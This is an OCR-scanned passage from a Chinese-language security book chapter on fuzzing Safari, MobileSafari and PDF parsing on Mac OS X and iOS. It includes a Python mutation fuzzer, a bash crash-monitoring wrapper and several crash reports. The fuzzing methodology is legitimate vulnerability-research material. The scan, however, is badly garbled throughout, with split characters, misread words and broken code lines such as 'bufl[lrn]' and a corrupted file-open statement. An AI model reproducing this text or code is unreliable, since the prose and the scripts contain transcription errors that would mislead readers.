模糊 测试 。 如 果 程 序 可 以 自行 处 理 错误 ， 而 且 它 是 非常 强健 的 , 那么 有 时 会 掩盖 内 存 破 坏 。 如 果 
程序 含有 比较 厉害 的 反 调试 机 制 〈 比如 DRM 软 件 )， 我 们 就 很 难 对 它们 进行 监测 。 正 因为 这 样 ， 
模糊 测试 并 不 总 是 漏洞 分 析 的 上 上 之 选 。 不 过 大 家 很 快 会 看 到 ， 它 对 于 大 多 数 iOS 应 用 来 说 都 是 
种 相当 有 效 的 查 bug 手 段 。 


6.2 如何 进行 模糊 测试 


对 应 用 进行 模糊 测试 涉及 若干 步 又 ,首先 就 是 要 搞 清楚 想 对 哪个 应 用 进行 模糊 测试 , 然后 是 
生成 用 于 模糊 测试 的 输入 。 在 此 之 后 ,我 们 就 需要 想 办 法 把 这 些 输入 送 进 应 用 。 最 后 ,我 们 还 需 
要 有 方法 监控 待 测 程序 ， 看 看 是 否 有 错误 发 生 。 

在 整个 流程 中 ， 鉴 定 要 测试 的 应 用 和 数据 类 型 是 最 重要 的 ， 虽然 这 个 步骤 需要 一 点 点 运气 。 
在 第 1 章 中 , 大 家 了 解 到 了 攻击 者 向 iOS 设 备 发 送 数 据 的 多 种 方式 。 大 家 在 选择 要 进行 模糊 测试 的 
应 用 时 , 会 有 很 多 种 选择 。 就 算是 决定 了 要 测试 的 应 用 , 我们 还 需要 决定 具体 要 用 什么 类 型 的 输 
和 人 进行 测试 。 例 如 ，MobileSafari 就 能 接受 多 种 类 型 的 输入 。 大 家 可 能 选择 MobileSafari 中 的 ,mov 
文件 ,或 是 更 确切 的 内 容 ， 比 如 选择 MobileSafari 中 .mov 文 件 的 媒体 头 原子 (Media Header Atom ) 
来 进行 模糊 测试 。 首 要 原则 就 是 : 越 是 含糊 不 清 的 应 用 和 协议 ,就 越 是 方便 下 手 。 此 外 ， 我们 若 
瞄准 那些 问世 时 间 比 较 和 久远 的 应 用 ( 比如 QuickTime ) 和 (或 ) 出 过 安全 问题 的 应 用 (是 的 ， 还 
是 QuickTime ) 也 是 很 有 帮助 的 。 
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6.2.1 基于 变异 的 模糊 测试 


一 旦 知道 自己 要 对 什么 应 用 进行 模糊 测试 ,你 就 需要 考虑 模糊 输入 (或 者 测试 用 例 ) 了 。 这 
里 , 你 主要 有 两 种 方式 可 以 选择 。 一 种 叫 作 基 于 变异 技术 的 ( mutation-based ) 模糊 测试 , 或 者 说 
“ 哑 ”(dumb ) 模糊 测试 。 这 种 模糊 测试 只 需要 花 几 分 钟 时 间 来 设置 和 运行 ,但 通常 找 不 出 藏 得 
很 深 的 bug。 它 的 原理 很 简单 : 先 选 一 种 有 效 的 输入 , 该 输入 可 能 是 .mov 等 文件 ,也 可 能 是 HTTP 
会 话 这 样 的 网 络 输入 ， 甚 至 可 能 是 一 组 命令 行 参数 ; 然后 对 这 种 有 效 输 入 进行 随机 修改 。 例 如 : 
GET /index.html HTTP/1.0 
可 能 被 算 改 成 如 下 等 字符 串 : 
EEEEEEEEEEEEEET /index.html HTTP/1.0 
ET /////////////// //index.html HTTP/1.0 
DU oS [=> SE html HTTP/1.0 


ET /index.html111111111111111111111111111111111111111 HTTP/1.0 
GET /index.html HTTP/1.00000000000000000 


如 果 程 序 员 对 某 个 字段 的 大 小 作出 了 不 正确 的 假定 , 这 些 输入 就 可 能 触发 某 种 错误 。 想 进行 
这 种 随机 改变 ， 大 家 并 不 需要 对 HTTP 协 议 的 工作 原理 有 任何 了 解 。 不 过 ， 正 如 大 家 可 能 会 想到 
的 那样 ， 对 数据 执行 了 健全 性 检查 的 Web 服 务 器 会 迅速 拒绝 这 样 的 输入 。 大 家 必须 要 对 有 效 输 入 
进行 修改 以 找 出 bug, 但 如 果 把 输入 改 得 太 离谱 ， 它 很 快 就 会 被 拒绝 。 这 就 要 求 我 们 找到 平衡 点 ， 
也 就 是 说 ， 既 需要 进行 足够 的 修改 以 引发 问题 ， 又 不 能 让 数据 变 得 太 过 离谱 。 本 章 展示 了 针对 
MobileSafari 展 开 的 基于 变异 的 模糊 测试 。 


6.2.2 ”基于 生成 的 模糊 测试 


很 多 研究 人 员 相 信 ， 在 模糊 输入 中 融入 越 多 对 协议 的 了 解 ， 就 越 有 机 会 找到 漏洞 。 这 就 要 提 
到 另 一 种 途径 了 : 构造 模糊 输入 ， 进 行 基于 生成 的 模糊 测试 ， 或 者 说 是 “智能 ”模糊 测试 。 基 于 
生成 的 模糊 测试 并 不 是 从 某 个 特定 的 有 效 输入 开始 ; 相反 , 你 要 先 弄 清楚 协议 规范 描述 这 几 类 输 
人 的 方式 。 所 以 , 对 于 前 面 那个 例子 而 言 , 这 里 不 是 先 对 Web 服 务 器 上 名 为 index.html 的 文件 发 出 
请 求 ， 而 是 先 从 HTTP 的 RFC ( www.ietf.org/rfe/rfe2616.txt ) 着 手 。 该 文档 的 第 5 节 就 描述 了 HTTP 
消息 必然 的 样子 : 



























































由 外 由 中 



















































































HITP-message = Request | Response ; HTTP/1.1 messages 

、 ， A ~ ZE AT hh 

该 文档 后 面 还 规定 了 Request 必 须 采 用 的 形式 : 

Request 三 Request-Line i Seetion .5:1 
*(( general-header ; Section 4.5 
| request-header ; Section 5.3 
| entity-header ) CRLF) ; Section 7.1 

CRLF 

[ message-body | i "Section 4...3 


进一步 深 挖 ， 你 会 看 到 对 Request-Line 的 如 下 规定 : 


Request-Line = Method SP Request-URI SP HTTP-Version CRLF 
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Method 则 被 定义 如 下 : 
Method = "OPTIONS" ; Section 9.2 
"GET" ; Section 9.3 
"HEAD" ; Section 9.4 
"POST" ; Section 9.5 
"PUT" ; Section 9.6 
"DELETE" ; Section 9.7 
"TRACE" ; Section 9.8 
"CONNECT " ; Section 9.9 
extension-method 
extension-method = token 
这 会 持续 相当 长 一 段 ， 不 过 最 终 RFC 规 定 了 HTTP 消 息 可 能 具有 的 格式 。 大 家 可 以 利用 这 一 
点 编写 这 样 的 程序 : 如 果 该 程序 能 理解 这 一 RFC 规 范 ， 它 就 能 创造 出 /valia/ (有 效 ) 却 又 


/malformed/【( 畸形 ) 的 HTTP 消息 。 例 如 ， 这 个 程序 可 以 生成 完全 有 效 的 Reaust-URI， 但 会 
选择 一 个 特别 长 的 方法 名 。 

基于 生成 的 模糊 测试 也 有 缺点: 太 费事 了 ! 大 家 必须 理解 相应 的 协议 ( 某 些 协议 可 能 是 专 有 
的 )， 而 且 需 要 一 个 程序 来 生成 畸形 却 又 基本 合乎 规范 的 输入 。 我 们 随后 会 看 到 如 何 利用 模糊 测 
试 框架 助力 这 一 工作 。 很 显然 ， 这 要 上 比 找 个 有 效 的 HTTP 消息 并 对 其 进行 随机 修改 麻烦 得 多 。 不 
过 ， 这 种 “智能 ”模糊 测试 的 优点 同样 明显 。 这 种 情况 下 ， 如 果 服 务 器 处 理 HTTP TRACE 请 求 的 
方式 存在 漏洞 ， 那 么 基于 变异 的 模糊 测试 是 没 法 发 现 问题 的 ， 因 为 它 只 进行 GET 请 求 (或 随机 命 
名 的 请 求 方法 )。 而 基于 生成 的 方法 会 为 每 种 可 能 的 方法 构造 模糊 过 的 REQUEST-LINE， 从 而 揭 
露 这 种 理论 上 的 bug。 众 话说， 一 分 耕耘 ， 一 分 收获 ， 这 里 也 是 同样 道理 。 在 模糊 测试 上 花 的 精 
力 越 多 ， 你 就 越 可 能 找 出 重大 的 漏洞 。 在 本 章 随后 的 内 容 中 ， 大 家 将 看 到 如 何 利 用 Sulley 模 糊 测 
试 框架 创建 基于 生成 的 测试 用 例 。 

















6.2.3 ”提交 和 监测 测试 用 例 


至 此 , 大 家 已 经 有 了 一 大 批 要 发 送 给 待 测试 程序 的 输入 , 而 且 必 须 搞 清楚 如 何 将 它们 送 入 程 
序 。 对 于 文件 而 言 ， 这 可 能 要 求 用 特殊 的 命令 行 参数 反复 地 启动 程序 。 对 于 网 络 服务 咒 来 说 ,大 
家 可 能 需要 用 程序 反复 连接 服务 器 并 发 送 某 一 测试 用 例 。 虽 然 这 通常 是 模糊 测试 过 程 中 最 简单 的 
一 个 步骤 , 但 在 iOS 中 有 时 很 难 做 到 ,因为 OS 操作 系统 不 是 为 全 功能 的 计算 机 设计 的 , 它 只 用 于 
手机 或 其 他 类 似 设 备 。 所 以 , 像 MobileSafari 这 样 的 程序 压根 就 不 能 从 命令 行 启动 ， 因 此 也 就 不 
能 从 命令 行 接受 URL。 这 种 情况 下 我 们 就 要 研究 替代 方法 。 

最 后 一 步 就 是 监测 进行 模糊 测试 的 应 用 , 看 看 有 没有 什么 错误 出 现 。 这 个 步骤 在 模糊 测试 中 
是 相当 关键 , 但 又 经 常 被 忽视 的 。 大 家 可 能 创造 出 世界 上 最 聪明 的 测试 用 例 , 但 如 果 没 办 法 弄 清 
楚 到 底 是 什么 地 方 出 错 了 ,那么 再 优秀 的 测试 用 例 也 不 会 对 测试 的 执行 带 来 什么 好 处 。 同 样 ， 如 
果 不 能 重复 错误 〈 比方 说 是 通过 保存 测试 用 例 )， 测 试用 例 就 无 助 于 发 现 问题 。 

监测 应 用 最 简单 的 方法 就 是 为 应 用 附加 调试 器 ,并 监察 异常 或 信号 。 当 程序 崩溃 后 ， 它 会 生 
成 调试 器 可 以 参照 的 信号 。 不 过 大 家 很 快 会 看 到 ， 在 Mac OS X 或 iOS 中 ， 这 通常 是 不 必要 的 。 我 
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们 还 可 以 在 应 用 的 监测 过 程 中 使 用 更 为 复杂 的 方法 。 大 家 可 以 监控 应 用 打开 了 哪些 文件 、 内 存 的 
使 用 情况 ， 等 等 。 总 之 , 监测 的 内 容 越 多 ,在 向 应 用 输入 合适 的 测试 用 例 时 你 就 越 会 注意 到 更 多 
的 问题 。 下 面 ， 我 们 就 要 讲 讲 怎样 进行 模糊 测试 了 。 


6.3 对 Safari 进行 模糊 测试 


iOS 是 精简 过 的 Mac OSX。 事实 上 , 这 两 者 有 大 部 分 代码 是 相同 的 ， 只 不 过 是 为 了 用 于 ARM 
平台 (代替 了 x86 或 PowerPC ) 而 重新 编译 过 。 因 此 , 在 为 iOS 系 统 找 bug 时 的 一 个 选择 就 是 在 Mac 
OS X 与 之 相同 的 代码 中 找 bug。 不 过 这 说 起 来 容易 做 起 来 难 ， 而 且 大 家 很 可 能 把 时 间 浪 费 在 分 析 
那些 iOS 中 根本 没有 的 代码 上 。 而 从 Mac OS X 查 bug 的 好 处 就 在 于 ， 在 桌面 计算 机 上 什么 事 都 要 
简单 一 些 。 大 家 可 以 在 许多 计算 机 上 运行 多 个 模糊 测试 实例 , 而 这 些 桌面 计算 机 的 硬件 也 要 比 iOS 
设备 的 好 ， 而 且 有 更 多 实用 工具 可 供 选 择 ， 等 等 。 换 句 话说 ， 与 OS 设备 相 比 ， 在 Mac OS X 桌 面 
计算 机 上 更 容易 开展 模糊 测试 , 而 且 在 给 定 的 时 间 内 能 用 多 得 多 的 测试 用 例 进行 模糊 测试 。 真正 
算得 上 缺点 的 只 有 一 条 ， 那 就 是 大 家 最 后 可 能 发 现 一 些 只 在 Mac OS X 中 存在 而 iOS 中 不 存在 的 漏 
洞 , 不 过 这 也 不 是 什么 过 于 糟糕 的 事情 ,我 在 本 章 后 面 的 内 容 中 还 会 介绍 对 iOS 更 有 针对 性 的 方法 。 

























































































6.3.1 选择 接口 


大 家 首先 需要 选择 要 对 什么 进行 模糊 测试 。 因 为 Safari 和 MobileSafari 都 使 用 了 WebKit 内 核 ， 
所 以 有 大 量 相同 的 代码 可 供 模糊 测试 。 简 单 起 见 ， 本 节 的 例子 将 会 对 PDF ( Portable Document 
Format， 便 携 文档 格式 ) 进行 模糊 测试 。Safari 和 MobileSafari 都 会 泻 染 这 些 文档 。 这 种 文档 格式 
是 很 不 错 的 目标 ， 因 为 它 是 种 相当 复杂 的 二 进 制 格式 。 由 于 Adobe 公 司 每 隔 几 个 月 就 会 公布 若干 
Acrobat Reader 的 漏洞 ， 而 Mac OS X 的 库 也 需要 处 理 类 似 的 文档 ， 因 此 我 们 有 理由 相信 这 些 代码 
中 也 潜藏 着 漏洞 。 


6.3.2 ”生成 测试 用 例 


对 文件 格式 进行 模糊 测试 的 一 个 优点 是 很 容易 生成 大 量 测 试用 例 。 要 进行 基于 变异 的 模糊 测 
试 , 我 们 只 需要 找 一 个 (或 几 个 ) 样 例 PDF 文 件 ， 并 对 其 进行 随机 改变 。 测 试用 例 的 质量 取决 于 
所 使 用 的 PDF 文 件 。 如 果 我 们 使 用 了 非常 简单 的 文件 ， 就 不 会 测试 多 少 PDF 解 析 代 码 ; 复杂 的 文 
件 效 果 更 好 。 理 想 状 态 下 ， 大 家 应 该 用 多 个 不 同 的 初始 PDF 文 件 生成 测试 用 例 ， 分别 试 验 PDF 规 
范 中 表述 的 不 同 特性 。 
下 面 的 Python 函数 可 以 向 缓冲 区 添加 随机 的 变化 。 大 家 可 以 设想 一 下 ， 读 人 PDF 文档 ， 并 反 
复 对 文档 的 内 容 调 用 该 函数 ， 以 生成 不 同 的 变化 过 的 文件 : 
def fuzz_buffer(buffer, FuzzFactor): 
buf = list(buffer) 
numwrites=random.randrange (math.ceil((float(len(buf)) / 


FuzzFactor)))+1 
for j in range (numwrites): 
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rbyte = random.randrange (256 ) 
rn = random.randrange (len (buf)) 
buf[lrn] = "%c"% (rbyte); 

return "".join(buf) 


虽然 这 段 代码 极为 简单 ， 但 人 们 已 经 用 它 在 Mac OS X 和 iOS 中 找到 过 大 量 漏洞 了 。 
6.3.3 测试 和 监测 应 用 


大 家 可 以 把 测试 和 监测 结合 起 来 ， 因 为 编写 的 工具 可 以 负责 这 两 项 工作 。 由 fuzz_buffer 
函数 生成 的 模糊 输入 要 发 送 给 受 测 试 的 应 用 。 同 时 ,大 家 需要 监测 应 用 , 看 看 是 否 有 输入 给 它 造 
成 了 麻烦 。 不 管 怎样 ， 如 果 从 未 发 现 所 构造 的 输入 让 程序 骨 演 过 ,那么 我 们 构造 完美 的 恶意 输入 
并 将 其 发 送 给 待 测试 的 程序 就 没有 任何 意义 了 。 

Mac OSX 和 iOS 中 都 有 的 摇 溃 报告 器 〈Crash Reporter ) 是 种 极 佳 的 机 制 ， 可 以 确定 何 时 出 现 
了 程序 崩 演 。 不 过 它 对 模糊 测试 来 说 并 不 完美 , 因为 月 演 报 告 器 的 结果 是 存放 在 某 些 目录 中 的 文 
件 , 这 些 目 录 会 在 月 演 发 生 后 很 快 出 现 , 但 会 在 出 现 若 干 次 崩 演 后 消失 。 因 此 ， 要 进行 监测 ,我 
们 最 好 是 仿制 一 个 crash.exe 程 序 ( 该 程序 原本 仅 用 于 Windows 系 统 )。 大 家 可 以 在 FileFuzz 
( http://labs.idefense.com/software/fuzzing.php ) 中 找到 Michael et exe。 这 个 简单 的 
程序 接受 待 启动 的 程序 、 运 行文 件 需要 的 上 毫秒 数 和 待 测试 程序 的 命令 行 参数 表 并 作为 命令 行 参 数 
使 用 。 

然后 ，crash.exe 会 启动 待 测试 程序 ， 并 附加 到 该 程序 之 上 ， 从 而 对 崩 演 或 其 他 不 好 的 行为 进 

监测 。 如 果 该 应 用 月 演 , 那么 crash.exe 就 会 打印 出 与 崩 淡 时 寄存 器 状态 有 关 的 某 些 信息 。 否则 ， 
er 的 毫秒 数 之 后 ， 它 会 关闭 程序 并 退出 ( 如 图 6-1 所 示 )。 




















图 6-1 在 Windows 中 用 crash.exe 找 朋 溃 


从 根本 上 讲 ，crash.exe 所 具有 的 如 下 特性 对 连续 多 次 执行 目标 程序 而 言 是 很 理想 的 。 它 会 用 
指定 的 参数 启动 目标 程序 , 而 且 能 让 目标 程序 在 经 过 一 定 的 时 间 后 保证 返回 。 它 可 以 识别 程序 何 
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时 崩溃 过 , 并 会 给 出 与 崩 演 (在 如 图 所 示 的 情况 中 就 是 寄存 器 的 上 下 文 转 储 ) 有 关 的 信息 ; 否则 ， 
它 就 会 打印 出 进程 已 终止 的 消息 。 最 后 ， 大 家 要 知道 目标 进程 在 crash.exe 终 止 后 是 不 再 运行 的 。 
最 后 这 一 点 是 很 重要 的 , 在 某 程序 有 一 个 实例 已 在 运行 的 情况 下 , 后 运行 的 实例 所 表现 出 的 行 》 
通常 会 有 所 不 同 。 

下 面 的 例子 表明 , 在 Mac OS 义 中 利用 月 湿 报 告 器 的 工作 原理 , 借助 一 个 简单 的 shell 脚 本 ( 名 
为 crash ) 模仿 这 种 行为 是 非常 容易 的 。( 该 脚本 是 用 bash 编 写 的 ， 并 没有 采用 Python， 这 样 可 以 
方便 大 家 在 iOS 中 使 用 该 脚本 。 大 家 最 好 不 要 在 iOS 中 使 用 Python， 因 为 用 Python 写 的 脚本 在 iOS 
中 运行 起 来 要 慢 一 些 。) 


#!/bin/bash 











mkdir logdir 2>/dev/null 

app=$1 

url=$2 

sleeptime=$3 
filename=~/Library/Logs/CrashReporter/s$app* 
mv $filename logdir/ 2> /dev/null 
/usr/bin/killall -9 "$app" 2>/dev/null 
open -a "$app" "$url" 

sleep $sleeptime 

cat $filename 2>/dev/null 


该 脚本 会 接受 待 启动 程序 的 名 称 、 要 传送 给 该 程序 的 命令 行 参数 和 返回 前 要 睡眠 的 秒 数 作为 
命令 行 参 数 。 它 会 把 所 考虑 程序 的 任何 崩 演 报告 都 移动 到 日 志 目 录 , 然后 终止 所 有 存在 的 目标 进 
旦 ， 并 调用 open 以 指定 的 参数 启动 应 用 。 调 用 open 是 种 不 错 的 进程 启动 方式 ， 因 为 它 允 许 大 家 

首 定 某 个 URL 并 作为 传送 给 Safari 的 命令 行 参数 。 如 果 只 是 要 启动 Safari 应 用 ,那么 它 只 需要 接受 
文件 名 。 最 后 ， 它 会 睡眠 所 请 求 的 秒 数 ， 并 打印 出 崩 演 报告 ( 如 果 存 在 的 话 )。 下 面 是 展示 其 用 
法 的 两 个 例子 。 


$ ./crash Safari http://192.168.1.182/go0d.html 10 





























$ 

$ ./crash Safari http://192.168.1.182/bad.html 10 

Process: Safari [57528] 

Path: /Applications/Safari.app/Contents/MacOS/Safari 
Identifier: com.apple.Safari 

Version: S11 (7534.51.,22) 

Build Info: WebBrowser-7534051022000000~3 

Code Type: X86-64 (Native) 


Parent Process: launchd [334] 
Date/Time: 2011-12-05 09:15:27.988 -0600 
OS Version: Mac OS X 10.7.2 (11C74) 


Report Version: 9 


Crashed Thread: 10 





Exception Type: EXC_BAD ACCESS (SIGBUS) 
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Exception Codes: KERN_ PROTECTION_FAILURE at 0x000000010aad5fe8 











Thread 0:: Dispatch queue: com.apple.main-thread 


0 libsystem kernel.dylib 0x00007fff917b567a 

mach msg_trap + 10 

1 libsystem kernel .dylib 0x00007fff917b4d71 mach msg 
+ 73 








有 了 这 个 实用 的 小 脚本 ,我 们 就 可 以 自动 启动 应 用 ,并 通过 解析 其 标准 输出 探测 是 否 存 在 
骨 演 。 该 脚本 的 男 一 点 好 处 就 是 适用 于 多 种 应 用 ， 而 不 仅 是 Safari。 下 面 这 样 的 例子 也 是 行 得 
通 的 : 


$ ./crash TextEdit toc.txt 3 
$ ./crash "QuickTime Player" good.mp3 3 


所 以 , 大 家 有 了 生成 输入 的 办 法 , 也 有 了 启动 程序 进行 测试 并 对 其 进行 监测 的 方法 , 接 下 来 
就 是 要 将 这 些 东 西 全 部 结合 起 来 : 


import random 
import math 
import subprocess 
import os 

import sys 




















def fuzz_buffer (buffer, FuzzFactor): 

buf = list(buffer) 
numwrites=random.randrange (math.ceil( (float(len(buf))/FuzzFactor)))+1 
for j in range (numwrites): 

rbyte = random.randrange (256) 

rn = random.randrange (len (buf)) 

bufl[lrn] = "%c"% (rbyte); 

return "".join (buf) 


def fuzz(buf, test_case number, extension, timeout, app_name): 
fuzzed = fuzz_buffer (buf, 10) 
fname = str(test_case_ number)+"-test"+extension 
out = open(fname, "wb") 
out .write (fuzzed) 
out .close() 
command = ["./crash", app_name, fname, str(timeout)] 
output = subprocess.Popen (command,stdout=subprocess.PIPE) .communicate() [0] 
if len(output) > 0: 
print "Crash in "+fname 
print output 
else: 
os.unlink (fname) 





if(len(sys.argv)<5): 
print "fuzz <app_name> <time-seconds> <exemplar> <num iterations>" 
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SYS .exit(0) 


else: 
上 = open(sve arcovw[3 "r*} 
inbuf = f.read() 
f.close() 


ext = SySs .argv[3] [sys ,argv[3] .rfind(",.");] 
for j in range(int(sys.argv[4])): 
fuzz(inbuf, j, ext, sys.argv[2], sys.argv[1]) 


6.4 PDF 模糊 测试 中 的 冒险 


如 果 在 较 老 ( 10.5.7 之 前 ) 版 本 的 Mac OS X 中 用 上 一 方 提 到 的 模糊 器 对 PDF 进 行 模糊 测试 ， 
你 就 可 能 重新 发 现 早 在 2009 年 就 被 人 发 现 的 JBIG 漏 洞 〈http:/secunia.comy/secunia_Tesearchy/ 
2009-24/ )。 该 漏洞 在 Mac OS X 和 iOS 2.2.1 及 更 早 版 本 中 都 出 现 过 。 与 iOS 中 该 bug 对 应 的 崩溃 报 
告 如 下 所 示 : 


<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 
<dict> 
<key>AutoSubmitted</key> 
<true/> 
<key>SysInfoCrashReporterKey</key> 
<string>c81dedd724872cf57fb6a432aa482098265fa401</string> 
<key>bug_type</key> 
<string>109</string> 
<key>description</key> 
<string>Incident Identifier: E38AB756-D3E6-43D0-9FFA-427433986549 
CrashReporter Key: c81dedd724872cf57fb6a432aa482098265fa401 




















Process: MobileSafari [20999] 

Path: /Applications/MobileSafari .app/MobileSafari 
Identifier: MobileSafari 

Version: PP (PY 

Code Type: ARM (Native) 





Parent Process: launchgd [1] 


Date/Time: 2009-06-15 12:57:07.013 -0500 
OS Version: IOS OS 2.2 (5G77) 
Report Version: 103 





Exception Type: EXC_BAD ACCESS (SIGSEGV) 
Exception Codes: KERN_INVALID ADDRESS at 0xc000000b 
Crashed Thread: 0 

















Thread 0 Crashed: 


0 libJBIG2.A.dylib 0x33c88fa8 0x33c80000 + 36776 
王 libJBIG2.A.dylib 0x33c89da0 0x33c80000 + 40352 
2 libJBIG2.A.dylib 0x33c8alb0 0x33c80000 + 41392 
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该 bug 印 证 了 利用 桌面 模糊 测试 可 以 找 出 iOS 中 的 bug, 因为 它 说 明 桌 面 操作 系统 中 发 现 的 bug 
(有 时 ) 也 可 能 在 iOS 中 出 现 。 不 过 ， 事 情 并 非 总 是 这 么 简单 。 事 实证 明 ， 虽 然 Mac OS X 桌 面 版 
和 iOS 中 的 Web 浏 览 器 都 能 泻 染 和 显示 PDF 文件 , 但 iOS 版 本 的 功能 没 那么 全 ,而 且 没 法 像 Mac OS 
X 的 版 本 那样 区 驭 PDF 文件 的 所 有 错 绿 复杂 的 特性 。 一 个 突出 的 例子 就 是 Charlie Miller 用 来 启 得 
2009 年 Pwn20wn 大赛 的 bug ( http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn20own-2009-day- 
1---safariinternet-explorer-and-firefox-taken-down-by-four-zero-day-exploits )。 该 bug 存 在 于 Mac OS X 
处 理 恶 意 CFF ( Compact Font Format， 压 缩 字 体格 式 ) 的 方法 中 。 该 漏洞 可 由 efont-face HTTP 
标记 直接 在 浏览 絮 中 触发 ,但 在 比赛 中 Miller 把 字体 散 入 了 PDF 文 件 之 中 。 想 利用 该 漏洞 造成 的 
堆 溢出 进行 漏洞 攻击 是 有 点 难度 的 , 但 显然 是 可 行 的 ! 情况 在 iOS 中 则 不 同 。iOS 似 乎 完全 忽略 了 
能 入 的 字体 ， 而 且 完全 不 受 这 一 文件 的 影响 。 这 就 说 明 ， 有 时 候 Mac OS X 存 在 某 bug， 大 家 认为 
iOS 中 也 会 有 相同 的 bug， 但 实际 上 却 没 有 。 再 例如 ，Miller 在 securityevaluators.cory/files/slides/ 
cmiller CSW_2010.ppt 中 说 他 在 Mac OS X 中 发 现 了 281 个 不 同 的 涉及 PDF 的 Safari 程 序 崩溃 ,但 其 
中 只 有 22 个 ( 约 为 281 个 的 7.8% ) 会 让 MobileSafari 裔 演 。 

下 面 是 男 一 个 由 字体 引起 的 PDF 崩 演 ， 它 也 是 只 出 现在 Mac OS X 中 ， 并 会 不 出 现在 iOS 中 。 
该 漏洞 在 撰写 这 些 文字 时 尚未 得 到 修补 。 

































































Process: Safari [58082] 

Path : /Applications/Safari.app/Contents/MacOS/Safari 
Identifier: com.apple.Safari 

Version: 5.1.1 (7534.51.22) 

Build Info: WebBrowser-7534051022000000~3 

Code Type: X86-64 (Native) 


Parent Process: 
Date/Time: 

OS Version: 
Report Version: 


Crashed Thread: 


Exception Type: 


Exception Codes: 


VM Regions Near 0: 


一 一 > 
TEXT 





launchd [334] 

2011-12-05 09:46:10.589 -0600 
Mac OS X 10.7.2 (11C74) 

9 


0 Dispatch queue: com.apple.main-thread 


EXC_BAD ACCESS (SIGSEGV) 
KERN_INVALID ADDRESS at 0x0000000000000000 

















00000001041ab000-00000001041ac000 
[ 4K] r-x/rwx SM=COW 


/Applications/Safari.app/Contents/MacOS/Safari 


Application Specific Information: 
objc[58082]: garbage collection is OFF 


Thread 0 Crashed:: 

0 libFontParser.dylib 
TFormat6UTF1l6cmapTable: :Map (unsigned short const*, 
unsigned short*, unsigned int&) const + 321 

1 libFontParser.dylib 


Dispatch queue: com.apple.main-thread 


Ox00007fff8dd079dd 


Ox00007fff8dd07a9f 
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TcmapEncodingTable: :MapFormat6 (TcmapTableData 
const&, unsigned char const*&, unsigned int, 
unsigned short*, unsigned int&) const + 89 





2 libFontParser.dylib Ox00007fff8dce9f71 
TcmapEncodingTable: :Map (unsigned char const*e&, 
unsigned int, unsigned short*, unsigned intg&) 

const 
+ 789 

3 libFontParser.dylib 0x00007fff8dd197b9 





FPFoNntGetTrueTypeEncoding + 545 

大 家 还 可 能 发 现 一 个 问题 : 在 桌面 系统 中 引发 程序 崩 湿 的 文件 需要 的 资源 太 多 了 , 可 能 超过 
了 移动 设备 的 处 理 能 力 。 这 样 一 来 我 们 就 没 法 说 明 该 bug 是 否 也 在 iOS 中 存在 , 因为 可 能 只 是 特定 
的 文件 过 大 ,从 而 无 法 将 其 完整 地 泻 染 出 来 。 如 果 在 桌面 系统 中 发 现 的 bug 看 起 来 很 有 意思 的 话 ， 
我 们 就 值得 花 时 间 将 相应 的 PDF 文 件 缩小 到 一 个 可 以 处 理 的 大 小 ， 而 试 着 让 bug 原 封 不 动 。 这 也 
许 需 要 耗费 大 量 的 精力 , 并 可 能 要 求 我 们 对 漏洞 有 全 面 的 了 解 。 而 且 这 甚至 有 可 能 是 个 没 法 完成 








的 任务 。 为 了 说 明 这 种 情况 ， 下 面 给 出 了 桌面 系统 中 的 一 个 比较 老 的 系统 表演 : 
Process : Safari [11068] 
Path: /Applications/Safari.app/Contents/MacOS/Safari 
Identifier: com.apple.Safari 
Version: 4.0 (5530.17) 
Build Info: WebBrowser-55301700~2 
Code Type: X86 (Native) 
Parent Process: launchd [86] 


Date/Time: 
OS Version: 
Report Version: 
Anonymous UUID: 


2009-06-15 13:14:04.182 -0500 


Mac OS X 10.5.7 (9J61) 
6 
FE533568-9587-4762-94D2-218B84ACA99C 








Exception Type: 
Exception Codes: 
Crashed Thread: 


EXC_BAD ACCESS (SIGBUS) 
KERN_PROTECTION_FAILURE at 0x0000000000000050 
0 














Thread 0 Crashed: 





0 com.apple.CoreGraphics 0x913ba9c1 
CGImageSetSharedIdentifier + 78 

1 com.apple.CoreGraphics 0x919d3b28 
complex_ draw_patch + 3153 

2 com.apple.CoreGraphics 0x919d5782 
cg_shading_ type6_draw + 7154 

:1 com.apple.CoreGraphics 0x919e7bc8 
CGShadingDelegateDrawShading + 354 

4 libRIP.A.dylib 0x95fd7750 
ripc_DrawShading + 8051 

5 com.apple.CoreGraphics 0x9142caa7 


CGContextDrawShading + 100 
如 果 我 们 在 i0OS 上 用 浏览 器 打开 同样 的 PDF， 浏 览 嚣 会 内 退 ， 就 好 像 骨 演 了 一 样 。 不 过 ， 这 
并 非 是 因为 浏览 器 朋 演 了 ， 而 是 因为 设备 的 有 限 资源 被 耗 尽 了 。 下 面 是 该 问题 的 问题 报告 : 
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Incident Identifier: FEBOAB3C-CB16-4B4E-A66A-FD27A9F2F7DE 
CrashReporter Key: 96fe78ade92e4beeeee112a637133bb905f£f07623 
OS Version: iOS OS 3.0 (7A341) 
Date: 2009-06-15 11:18:39 -0700 
Free pages: 244 
Wired pages: 6584 
Purgeable pages: 0 
Largest process: MobileSafari 
Processes 
Name UUID Count resident pages 
MobileSafari <72f90a06ab2018c76f683bcd3706fa8b> 


5110 (jettisoned) (active) 
我 们 不 可 能 从 这 上 段 信息 中 分 辨 出 OS 的 相应 代码 是 否 存 在 漏洞 。 不 过 ， 这 并 不 完全 是 坏 消 
息 。 我 们 也 有 可 能 利用 这 种 方法 在 iOS 中 找到 一 些 真正 的 bug。 图 6-2 展 示 了 Mac OS X 中 的 崩溃 
报告 。 


























图 6-2” Mac OS X 中 的 表演 报告 


图 6-3 展 示 了 相同 的 崩溃 〈 在 iOS 中 有 着 几乎 相同 的 回溯 跟踪 信息 )。 
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图 6-3 ”iOS 中 相同 的 报告 


6.5 ”对 快速 查看 “Quick Look) 的 模糊 测试 


作为 一 种 容易 上 手 的 方法 ， 抱 着 MobileSafari 具 有 相同 漏洞 的 期 望 对 Safari 进 行 模糊 测试 效果 
不 错 。 但 它们 其 实 是 不 同 的 程序 ， 如 果 想 要 继续 用 这 种 借助 于 对 Mac OS X 进 行 模糊 测试 的 方法 
捕捉 i0S 的 bug， 我 们 就 必须 改变 一 些 行事 方式 。 考 虑 一 下 这 两 种 浏览 需 处 理 Microsoft Office 文 件 
